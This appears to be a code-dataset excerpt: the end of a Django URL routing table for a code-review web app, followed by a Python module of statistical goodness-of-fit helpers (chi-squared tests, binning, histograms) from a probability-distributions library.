    (r'^(\d+)/unstar$', 'unstar'),
    (r'^(\d+)/draft_message$', 'draft_message'),
    (r'^api/(\d+)/?$', 'api_issue'),
    (r'^api/(\d+)/(\d+)/?$', 'api_patchset'),
    (r'^user/([^/]+)$', 'show_user'),
    (r'^user/([^/]+)/block$', 'block_user'),
    (r'^inline_draft$', 'inline_draft'),
    (r'^repos$', 'repos'),
    (r'^repo_new$', 'repo_new'),
    (r'^repo_init$', 'repo_init'),
    (r'^branch_new/(\d+)$', 'branch_new'),
    (r'^branch_edit/(\d+)$', 'branch_edit'),
    (r'^branch_delete/(\d+)$', 'branch_delete'),
    (r'^settings$', 'settings'),
    (r'^account_delete$', 'account_delete'),
    (r'^migrate_entities$', 'migrate_entities'),
    (r'^user_popup/(.+)$', 'user_popup'),
    (r'^(\d+)/patchset/(\d+)$', 'patchset'),
    (r'^(\d+)/patchset/(\d+)/delete$', 'delete_patchset'),
    (r'^account$', 'account'),
    (r'^use_uploadpy$', 'use_uploadpy'),
    (r'^_ah/xmpp/message/chat/', 'incoming_chat'),
    (r'^_ah/mail/(.*)', 'incoming_mail'),
    (r'^xsrf_token$', 'xsrf_token'),
    # patching upload.py on the fly
    (r'^static/upload.py$', 'customized_upload_py'),
    (r'^search$', 'search'),
    (r'^tasks/calculate_delta$', 'calculate_delta'),
    (r'^tasks/migrate_entities$', 'task_migrate_entities'),
    )
# RSS feed classes, keyed by the <url> prefix captured below.
feed_dict = {
    'reviews': feeds.ReviewsFeed,
    'closed': feeds.ClosedFeed,
    'mine' : feeds.MineFeed,
    'all': feeds.AllFeed,
    'issue' : feeds.OneIssueFeed,
}
# Syndication entry point dispatching on feed_dict.
urlpatterns += patterns(
    '',
    (r'^rss/(?P<url>.*)$', 'django.contrib.syndication.views.feed',
     {'feed_dict': feed_dict}),
    )
|
forcedotcom/distributions | distributions/util.py | Python | bsd-3-clause | 7,375 | 0.000271 | # Copyright (c) 2014, Salesforce.com, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# - Neither the name of Salesforce.com nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy
import scipy.stats
from collections import defaultdict
def scores_to_probs(scores):
    """Convert unnormalized log scores to normalized probabilities.

    Subtracts the max score before exponentiating (the standard
    log-sum-exp stabilization), so extreme scores do not overflow
    or underflow ``exp``.

    Inputs:
        scores - a sequence of real-valued log scores
    Returns:
        a numpy float array of probabilities summing to 1
    """
    # Force a float copy: an integer input would make the in-place exp
    # below raise, and copying avoids mutating a caller-owned array.
    scores = numpy.array(scores, dtype=float)
    scores -= scores.max()
    probs = numpy.exp(scores, out=scores)
    probs /= probs.sum()
    return probs
def score_to_empirical_kl(score, count):
    """
    Convert total log score to KL( empirical || model ),
    where the empirical pdf is uniform over `count` datapoints.

    Inputs:
        score - total log score of `count` datapoints under the model
        count - number of datapoints (must be positive)
    Returns:
        KL divergence estimate as a float
    """
    n = float(count)
    mean_log_score = score / n
    # KL(empirical || model) = -E[log model] - log(count) for a uniform
    # empirical distribution over the datapoints.
    return -mean_log_score - numpy.log(n)
def print_histogram(probs, counts):
    """Print an ASCII bar chart of (probability, count) pairs.

    Rows are sorted by descending probability; bar widths are scaled so
    the largest count spans WIDTH characters.
    """
    WIDTH = 60.0
    max_count = max(counts)
    # Single-argument print(...) calls behave identically under
    # Python 2 and Python 3, unlike the bare print statement.
    print('{: >8} {: >8}'.format('Prob', 'Count'))
    for prob, count in sorted(zip(probs, counts), reverse=True):
        width = int(round(WIDTH * count / max_count))
        print('{: >8.3f} {: >8d} {}'.format(prob, count, '-' * width))
def multinomial_goodness_of_fit(
        probs,
        counts,
        total_count,
        truncated=False,
        plot=False):
    """
    Pearson's chi^2 test, on possibly truncated data.
    http://en.wikipedia.org/wiki/Pearson%27s_chi-squared_test

    Inputs:
        probs - expected probability of each bin
        counts - observed count in each bin
        total_count - number of samples drawn; equals sum(counts)
            unless `truncated` is True
        truncated - if True, (probs, counts) cover only part of the
            support, so one fewer degree of freedom is NOT subtracted
        plot - if True, print an ASCII histogram of the data

    Returns:
        p-value of truncated multinomial sample.
    """
    assert len(probs) == len(counts)
    assert truncated or total_count == sum(counts)
    chi_squared = 0
    dof = 0
    if plot:
        print_histogram(probs, counts)
    for p, c in zip(probs, counts):
        if p == 1:
            # Degenerate distribution: fit is perfect iff all mass landed here.
            return 1 if c == total_count else 0
        assert p < 1, 'bad probability: %g' % p
        if p > 0:
            mean = total_count * p
            variance = total_count * p * (1 - p)
            assert variance > 1,\
                'WARNING goodness of fit is inaccurate; use more samples'
            chi_squared += (c - mean) ** 2 / variance
            dof += 1
        else:
            # Single-argument print(...) works under both Python 2 and 3;
            # the bare print statement here was Python-2-only.
            print('WARNING zero probability in goodness-of-fit test')
            if c > 0:
                # Impossible observation under the model.
                return float('inf')
    if not truncated:
        dof -= 1
    survival = scipy.stats.chi2.sf(chi_squared, dof)
    return survival
def unif01_goodness_of_fit(samples, plot=False):
    """
    Bin uniformly distributed samples and apply Pearson's chi^2 test.

    Inputs:
        samples - values assumed drawn from Uniform[0, 1]
        plot - if True, print an ASCII histogram of the binned data
    Returns:
        p-value from multinomial_goodness_of_fit on the equal-width bins
    """
    samples = numpy.array(samples, dtype=float)
    assert samples.min() >= 0.0
    assert samples.max() <= 1.0
    # Cube-root rule for the number of bins.
    bin_count = int(round(len(samples) ** 0.333))
    assert bin_count >= 7, 'WARNING imprecise test, use more samples'
    # Builtin dtypes: the numpy.float / numpy.int aliases were removed
    # in NumPy 1.24.
    probs = numpy.ones(bin_count, dtype=float) / bin_count
    counts = numpy.zeros(bin_count, dtype=int)
    for sample in samples:
        # Clamp so that a sample of exactly 1.0 lands in the last bin
        # instead of indexing one past the end of `counts`.
        counts[min(int(bin_count * sample), bin_count - 1)] += 1
    return multinomial_goodness_of_fit(probs, counts, len(samples), plot=plot)
def density_goodness_of_fit(samples, probs, plot=False):
    """
    Transform arbitrary continuous samples to unif01 distribution
    and assess goodness of fit via Pearson's chi^2 test.

    Inputs:
        samples - a list of real-valued samples from a distribution
        probs - a list of probability densities evaluated at those samples
    Returns:
        p-value from unif01_goodness_of_fit on the transformed gaps
    """
    assert len(samples) == len(probs)
    assert len(samples) > 100, 'WARNING imprecision; use more samples'
    # sorted() materializes and orders the pairs in one step; under
    # Python 3, zip() returns an iterator with no .sort() method.
    pairs = sorted(zip(samples, probs))
    samples = numpy.array([x for x, p in pairs])
    probs = numpy.array([p for x, p in pairs])
    # Geometric mean of adjacent densities approximates the density on
    # each gap between consecutive order statistics.
    density = numpy.sqrt(probs[1:] * probs[:-1])
    gaps = samples[1:] - samples[:-1]
    # Normalized gaps are approximately Exponential(1); this CDF
    # transform maps them onto Uniform[0, 1].
    unif01_samples = 1.0 - numpy.exp(-len(samples) * gaps * density)
    return unif01_goodness_of_fit(unif01_samples, plot=plot)
def discrete_goodness_of_fit(
        samples,
        probs_dict,
        truncate_beyond=8,
        plot=False):
    """
    Transform arbitrary discrete data to multinomial
    and assess goodness of fit via Pearson's chi^2 test.

    Inputs:
        samples - a list of hashable observations
        probs_dict - maps each possible observation to its probability
        truncate_beyond - keep only this many highest-probability bins
            (0 or None disables truncation)
        plot - if True, print an ASCII histogram of the data
    Returns:
        p-value from multinomial_goodness_of_fit
    """
    assert len(samples) > 100, 'WARNING imprecision; use more samples'
    counts = defaultdict(lambda: 0)
    for sample in samples:
        assert sample in probs_dict
        counts[sample] += 1
    # dict.iteritems() was removed in Python 3; items() works in both.
    items = [(prob, counts.get(i, 0)) for i, prob in probs_dict.items()]
    items.sort(reverse=True)
    truncated = (truncate_beyond and truncate_beyond < len(items))
    if truncated:
        items = items[:truncate_beyond]
    probs = [prob for prob, count in items]
    counts = [count for prob, count in items]
    return multinomial_goodness_of_fit(
        probs,
        counts,
        len(samples),
        truncated=truncated,
        plot=plot)
def bin_samples(samples, k=10, support=()):
    """
    Bins a collection of univariate samples into k bins of equal
    fill via the empirical cdf, to be used in goodness of fit testing.

    Returns
        counts : array k x 1
        bin_ranges : array k x 2

    each count is the number of samples in [bin_min, bin_max)
    except for the last bin which is [bin_min, bin_max]

    If `support` is nonempty, its two endpoints replace the outermost
    bin boundaries.

    list partitioning algorithm adapted from Mark Dickinson:
    http://stackoverflow.com/questions/2659900
    """
    # NOTE: the default is an immutable empty tuple rather than a mutable
    # [] literal, avoiding the shared-mutable-default pitfall; behavior
    # is identical since the default is never mutated and only truth-tested.
    samples = sorted(samples)

    N = len(samples)
    q, r = divmod(N, k)
    # Spread the remainder over the first r bins so sizes differ by at
    # most one; tests would be inaccurate with small bins at the end.
    indices = [i * q + min(r, i) for i in range(k + 1)]

    bins = [samples[indices[i]: indices[i + 1]] for i in range(k)]
    bin_ranges = []
    counts = []
    for i in range(k):
        bin_min = bins[i][0]
        try:
            # Each bin's upper edge is the next bin's smallest sample...
            bin_max = bins[i + 1][0]
        except IndexError:
            # ...except the last bin, which is closed at its own maximum.
            bin_max = bins[i][-1]
        bin_ranges.append([bin_min, bin_max])
        counts.append(len(bins[i]))
    if support:
        bin_ranges[0][0] = support[0]
        bin_ranges[-1][1] = support[1]
    return numpy.array(counts), numpy.array(bin_ranges)
def histogram(samples, bin_count=None):
    """Tally occurrences of each nonnegative integer in `samples`.

    Inputs:
        samples - a sequence of integer-valued observations
        bin_count - length of the returned array; defaults to
            numpy.max(samples) + 1
    Returns:
        an int array `t` where t[i] is how many times i appears
    """
    if bin_count is None:
        bin_count = numpy.max(samples) + 1
    tallies = numpy.zeros(bin_count, dtype=int)
    for value in samples:
        tallies[value] += 1
    return tallies
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.